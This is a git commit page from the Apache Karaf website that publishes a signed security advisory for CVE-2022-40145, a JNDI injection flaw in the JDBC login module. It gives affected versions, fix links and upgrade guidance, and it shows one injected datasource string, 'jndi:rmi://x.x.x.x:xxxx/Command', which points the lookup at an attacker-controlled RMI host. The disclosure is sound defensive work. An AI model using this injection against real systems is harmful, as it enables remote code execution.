Google Git
Sign in
apache / karaf-site / b8716466cc3c3159bca4fb356852e937c96d36d7^! / .
commitb8716466cc3c3159bca4fb356852e937c96d36d7[log] [tgz]
authorJean-Baptiste Onofré <jbonofre@apache.org>Mon Dec 12 11:20:35 2022 +0100
committerJean-Baptiste Onofré <jbonofre@apache.org>Mon Dec 12 11:20:35 2022 +0100
tree348e9b69ff6e34e4b234fe369d7005477522f9a7
parent487ce733c96338f2c3742ee8ec9355cc117f6454 [diff]
Publish CVE-2022-40145 advisory notice

diff --git a/security/cve-2022-40145.txt b/security/cve-2022-40145.txt
new file mode 100644
index 0000000..fd29009
--- /dev/null
+++ b/security/cve-2022-40145.txt

@@ -0,0 +1,52 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Hash: SHA512
+
+CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8
+
+Severity: Low
+
+Vendor: The Apache Software Foundation
+
+Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2
+
+Description:
+
+The method org.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
+uses InitialContext.lookup(jndiName) without filtering.
+User can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" +
+DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,
+"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
+
+This vulnerable to a remote code execution (RCE) attack when a
+configuration uses a JNDI LDAP data source URI when an attacker has
+control of the target LDAP server.
+
+This has been fixed in revision:
+
+https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
+https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1
+
+Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2
+or later as soon as possible, or use correct path.
+
+JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7568
+
+Credit: This issue was discovered and reported by Xun Bai <bbbbear68@gmail.com>
+-----BEGIN PGP SIGNATURE-----
+
+iQIzBAEBCgAdFiEEGqjPktQJpzOT0Lc2v/LuQsgoLnYFAmOW/5wACgkQv/LuQsgo
+LnaRtBAApAsUA7+zVl03d0pKa7Dd41uec9/voRZ9DSf0byRNdP/NQslAe6ZHEbqz
+/2pC3OuYj0yfBOWZ6O0uFb/iDt4+GqAz3mnZqRyDq+hcrdBY5VVxkOU+6uRtQ+Sm
+GfkDmMpJDLOURgG/xQa/G8QhOLiBtBErwB5pffMBoxC12HjBPfichM6KJuT55MGR
+yvR6CXsPnAlRkyhYPSkI9ehng2BbgnqCHtFQEZwXTViXoyz44/0NZc6URlytsO11
+a3/qbkP1p8nvwC5U5D4P/RKRLvN23HZFbFRRms/gNN+L9BKmv8krA3ESnNgi7Kcj
+7j+8gRYRzw/g41GuZARC435zCy8PH9ydoHZQnicSmQUpDzBwfCBpRFgiXpq3ztHt
+7sLa3rSOVWiJmQiAjQXM1Rr958TrBYRjV2UcTbb0AYEEiZQrAeYHq1M5Y+3pcV9h
+NsqEeVkDZji0nu1EoTbxcjIJjMo1G8u3k8VvKMAfrQ37gnCfOnKYYak47cwvZzmu
+suatXXUQffi/YR3wercn/1AyCqYmWPbrcvI2b41eDR5JtDX6OMtRdsshCVwjEh9v
+k2FSoPCM21+lpbXful4LwIMUppNfwrvn4VXsAsWG4I/g8kxbrFbI0Y/cJHPuCbU2
+ABpIBEZGXh8h8TMIimM7EGkKIiF2rlohKsavtgYoi91qrpmca70=
+=ozdD
+-----END PGP SIGNATURE-----